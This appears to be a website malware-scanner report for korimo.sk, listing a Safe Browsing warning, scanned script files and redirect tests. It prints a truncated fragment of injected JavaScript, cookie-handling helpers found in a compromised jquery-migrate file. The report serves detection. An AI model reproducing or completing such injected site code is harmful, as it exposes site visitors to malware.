Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=korimo.sk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.korimo.sk/ | 200 OK Content-Length: 28381 Content-Type: text/html | clean |
http://www.korimo.sk/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 97291 Content-Type: text/javascript | clean |
http://www.korimo.sk/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8089 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( Antivirus reports:
| ||
http://www.korimo.sk/wp-content/plugins/jetpack/_inc/postmessage.js?ver=3.1.1 | 200 OK Content-Length: 20504 Content-Type: text/javascript | clean |
http://www.korimo.sk/wp-content/plugins/jetpack/_inc/jquery.inview.js?ver=3.1.1 | 200 OK Content-Length: 6479 Content-Type: text/javascript | clean |
http://www.korimo.sk/wp-content/plugins/jetpack/_inc/jquery.jetpack-resize.js?ver=3.1.1 | 200 OK Content-Length: 8993 Content-Type: text/javascript | clean |
http://www.korimo.sk/wp-content/plugins/bbpress/templates/default/js/editor.js?ver=2.5.4-5380 | 200 OK Content-Length: 2288 Content-Type: text/javascript | clean |
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201438 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Sepaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.korimo.sk/wp-content/plugins/jetpack/modules/wpgroho.js?ver=3.9.2 | 200 OK Content-Length: 1848 Content-Type: text/javascript | clean |
http://www.korimo.sk/wp-includes/js/comment-reply.min.js?ver=3.9.2 | 200 OK Content-Length: 1646 Content-Type: text/javascript | clean |
http://www.korimo.sk/wp-content/themes/contango/lib/js/superfish/superfish-combine.min.js?ver=1.5.9 | 200 OK Content-Length: 5971 Content-Type: text/javascript | clean |
http://www.korimo.sk/wp-content/themes/contango/lib/js/common.js?ver=1.0 | 200 OK Content-Length: 1465 Content-Type: text/javascript | clean |
http://www.korimo.sk/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-en.js?ver=2.6.11 | 200 OK Content-Length: 12114 Content-Type: text/javascript | clean |
http://www.korimo.sk/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.6.11 | 200 OK Content-Length: 72634 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: korimo.sk
Result:
GET / HTTP/1.1
Host: korimo.sk
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: korimo.sk
Referer: http://www.google.com/search?q=korimo.sk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: korimo.sk
Referer: http://www.google.com/search?q=korimo.sk
Result:
The result is similar to the first query. There are no suspicious redirects found.